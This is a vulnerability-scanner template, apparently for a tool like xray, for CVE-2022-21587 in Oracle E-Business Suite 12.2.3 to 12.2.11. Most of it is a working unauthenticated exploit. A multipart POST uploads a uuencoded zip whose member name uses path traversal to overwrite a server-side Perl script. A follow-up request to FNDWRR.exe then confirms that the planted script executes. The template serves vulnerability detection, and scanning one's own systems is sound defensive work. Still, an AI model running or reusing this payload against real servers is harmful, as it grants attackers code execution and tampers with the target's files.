id: CVE-2022-21587

info:
  name: Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution
  author: rootxharsh,iamnoooob,pdresearch
  severity: critical
  description: |
    Oracle E-Business Suite 12.2.3 through 12.2.11 is susceptible to remote code execution via the Oracle Web Applications Desktop Integrator product, Upload component. An attacker with HTTP network access can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
    FOFA: app="Oracle-E-Business-Suite"
  reference:
    - https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/
    - https://www.oracle.com/security-alerts/cpuoct2022.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-21587
    - http://packetstormsecurity.com/files/171208/Oracle-E-Business-Suite-EBS-Unauthenticated-Arbitrary-File-Upload.html
  tags: cve,intrusive,ebs,unauth,kev,cve2022,rce,oast,oracle,packetstorm
  created: 2023/06/23

set:
    rboundary: randomLowercase(8)
    rstr1: randomLowercase(8)
rules:
    r0:
        request:
            method: POST
            path: /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE
            headers:
                Content-Type: multipart/form-data; boundary=********************{{rboundary}}
            body: "--********************{{rboundary}}\nContent-Disposition: form-data; name=\"uploadfilename\"; filename=\"tempp.zip\"\nContent-Type: application/octet-stream\n\nbegin 644 tempp.zip\nM4$L#!!0 \" @( \"2#:E8               !#    +BXO+BXO+BXO+BXO+BXO\nM1DU77TAO;64O3W)A8VQE7T5\"4RUA<' Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.\nM1%=24BYP;\"LM3E5P=O>TYBHHRLPK 3&MK#)2$U-2BS04=$LJ\"U(5;.T4U$M2\nM*TKT\"W(2,_/4%32MN7(K%522<U,4;*'J2TH*-(!JBDO4-6$&@>2MN4KS<C+S\nMLC7BX]T\\?5SCXS6M4RLR2ZP!4$L'\"(WHV(YE    =    %!+ 0(4 !0 \" @(\nM \"2#:E:-Z-B.90   '0   !#                       N+B\\N+B\\N+B\\N\nM+B\\N+B]&35=?2&]M92]/<F%C;&5?14)3+6%P<#$O8V]M;6]N+W-C<FEP=',O\nB='AK1DY$5U)2+G!L4$L%!@     !  $ <0   -8       $!\n \nend\n\n--********************{{rboundary}}--\n"
        expression: response.status == 200 && response.body.bcontains(b"<?xml") && response.body.bcontains(b"bne:text=\"")
    r1:
        request:
            method: GET
            path: /OA_CGI/FNDWRR.exe
            headers:
                test: '{{rstr1}}'
        expression: response.status == 200 && response.body.bcontains(bytes(string(rstr1)))
expression: r0() && r1()